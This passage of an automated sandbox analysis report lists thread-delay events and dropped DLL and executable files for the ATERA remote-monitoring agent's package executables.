                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598640
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598531
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598411
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598296
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598187
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 598077
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597968
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597859
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597750
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597640
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597531
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597421
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597312
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597203
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 597093
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596984
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596875
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596765
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596654
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596547
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596422
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596312
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596203
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 596093
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 595984
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 595875
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 595765
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 595656
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 595547
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599860
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599625
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599202
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 599075
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598954
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598829
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598711
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598601
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598478
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598297
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 598024
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597907
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597793
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597681
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597569
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597438
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597320
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597204
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 597079
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596954
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596838
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596719
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596594
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596484
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596373
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596250
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 596032
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595907
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595797
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595688
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595563
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595438
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595313
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595188
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 595077
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594954
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594829
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594704
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594579
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594454
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594329
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594204
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 594079
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593954
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593829
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593704
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593579
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593454
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593329
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593214
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 593094
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 592969
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeThread delayed: delay time: 592847
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599887
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599766
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599641
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599516
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599404
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599283
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599172
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 599063
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598953
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598813
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598688
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598578
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598464
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598348
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598227
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 598114
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597982
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597875
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597750
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597638
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597513
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597399
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597240
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 597087
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596954
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596797
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596688
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596578
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596469
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596360
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596235
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596105
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 596000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595890
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595683
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595568
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595452
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595331
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595188
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 595000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 594823
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 594688
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 594563
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 594375
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 594260
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 594148
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 594035
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593921
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593793
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593683
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593578
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593468
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593346
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593232
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593125
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeThread delayed: delay time: 593015
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWindow / User API: threadDelayed 3780
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWindow / User API: threadDelayed 5867
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWindow / User API: threadDelayed 2936
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWindow / User API: threadDelayed 6701
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWindow / User API: threadDelayed 6094
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWindow / User API: threadDelayed 3776
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeWindow / User API: threadDelayed 5299
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeWindow / User API: threadDelayed 4482
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWindow / User API: threadDelayed 2910
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeWindow / User API: threadDelayed 3950
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWindow / User API: threadDelayed 1502
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeWindow / User API: threadDelayed 6277
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeWindow / User API: threadDelayed 3473
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exeWindow / User API: threadDelayed 7333
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exeWindow / User API: threadDelayed 2366
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeWindow / User API: threadDelayed 6128
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeWindow / User API: threadDelayed 3672
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.CommonLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\CredentialManagement.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Tracing.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Xml.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Dynamic.Runtime.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\CommunityToolkit.WinUI.Notifications.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XmlSerializer.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.Exceptions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Ping.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Microsoft.Win32.TaskScheduler.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.X509Certificates.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\StructureMap.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exeJump to dropped file
